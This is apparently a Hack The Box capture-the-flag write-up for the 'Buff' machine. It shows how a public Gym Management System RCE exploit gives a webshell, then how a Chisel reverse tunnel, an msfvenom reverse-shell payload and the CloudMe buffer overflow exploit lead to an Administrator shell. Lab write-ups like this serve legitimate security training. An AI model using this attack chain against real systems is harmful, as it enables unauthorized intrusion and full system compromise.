Hack The Box : Buff
10 September, 2021
Only one port is open as per the nmap scan
---------------------Starting Port Scan-----------------------
PORT STATE SERVICE
8080/tcp open http-proxy
---------------------Starting Script Scan-----------------------
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: mrb3n's Bro Hut
---------------------Starting Full Scan------------------------
PORT STATE SERVICE
7680/tcp open pando-pub
8080/tcp open http-proxy
Making a script scan on extra ports: 7680
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
While gobuster was running, I checked out the website, and on the contact page was a hint for the backend of this site
User
I searched for exploits for "Gym Management System" and found a number of them
$ searchsploit gym management
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - 'id' SQL Injection | php/webapps/48936.txt
Gym Management System 1.0 - Authentication Bypass | php/webapps/48940.txt
Gym Management System 1.0 - Stored Cross Site Scripting | php/webapps/48941.txt
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Using exploit 48506, I was able to get a shell as shaun and hence the user flag.
$ python2 /usr/share/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
buff\shaun
C:\xampp\htdocs\gym\upload> type C:\Users\shaun\Desktop\user.txt
<flag>
Root
Found an executable in shaun's Downloads
C:\xampp\htdocs\gym\upload> dir C:\Users\shaun\Downloads
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\Users\shaun\Downloads
14/07/2020 13:27 <DIR> .
14/07/2020 13:27 <DIR> ..
16/06/2020 16:26 17,830,824 CloudMe_1112.exe
1 File(s) 17,830,824 bytes
2 Dir(s) 7,106,600,960 bytes free
Assuming the version is 1.11.2 based on the name of the file, there are buffer overflow exploits available.
$ searchsploit cloudme
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
The Buffer Overflow attack 48389 was tested against Windows 10 so I decided to use that. It was a remote exploit so I executed the CloudMe binary and verified that port 8888 was indeed open.
C:\xampp\htdocs\gym\upload>C:\Users\shaun\Downloads\CloudMe_1112.exe
C:\xampp\htdocs\gym\upload> netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 BUFF:0 LISTENING
TCP 0.0.0.0:445 BUFF:0 LISTENING
TCP 0.0.0.0:5040 BUFF:0 LISTENING
TCP 0.0.0.0:7680 BUFF:0 LISTENING
TCP 0.0.0.0:8080 BUFF:0 LISTENING
TCP 0.0.0.0:49664 BUFF:0 LISTENING
TCP 0.0.0.0:49665 BUFF:0 LISTENING
TCP 0.0.0.0:49666 BUFF:0 LISTENING
TCP 0.0.0.0:49667 BUFF:0 LISTENING
TCP 0.0.0.0:49668 BUFF:0 LISTENING
TCP 0.0.0.0:49669 BUFF:0 LISTENING
TCP 10.10.10.198:139 BUFF:0 LISTENING
TCP 10.10.10.198:8080 10.10.16.5:38262 ESTABLISHED
TCP 127.0.0.1:3306 BUFF:0 LISTENING
TCP 127.0.0.1:8888 BUFF:0 LISTENING
There's a catch though, the server only listens on localhost and not 0.0.0.0, so I have to find a way around that. I learnt about Chisel from HackTricks and decided to use that to forward port 8888.
On Buff
C:\xampp\htdocs\gym\upload> .\chisel.exe client 10.10.16.5:4243 R:8888:127.0.0.1:8888
On my machine
$ ./chisel server -p 4243 --reverse
2021/09/10 12:24:41 server: Reverse tunnelling enabled
2021/09/10 12:24:41 server: Fingerprint qaI9x/PVWyLke4MZwFkek/J/UNltQTGHH4nEenA3ggk=
2021/09/10 12:24:41 server: Listening on http://0.0.0.0:4243
2021/09/10 12:24:58 server: session#1: tun: proxy#R:8888=>8888: Listening
After trying a few payloads windows/shell_reverse_tcp worked.
$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.16.5 LPORT=4242 -b '\x00\x0A\x0D' -f python -v payload
$ python 48389.py
I caught the shell as Administrator
$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.198] 49705
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
<flag>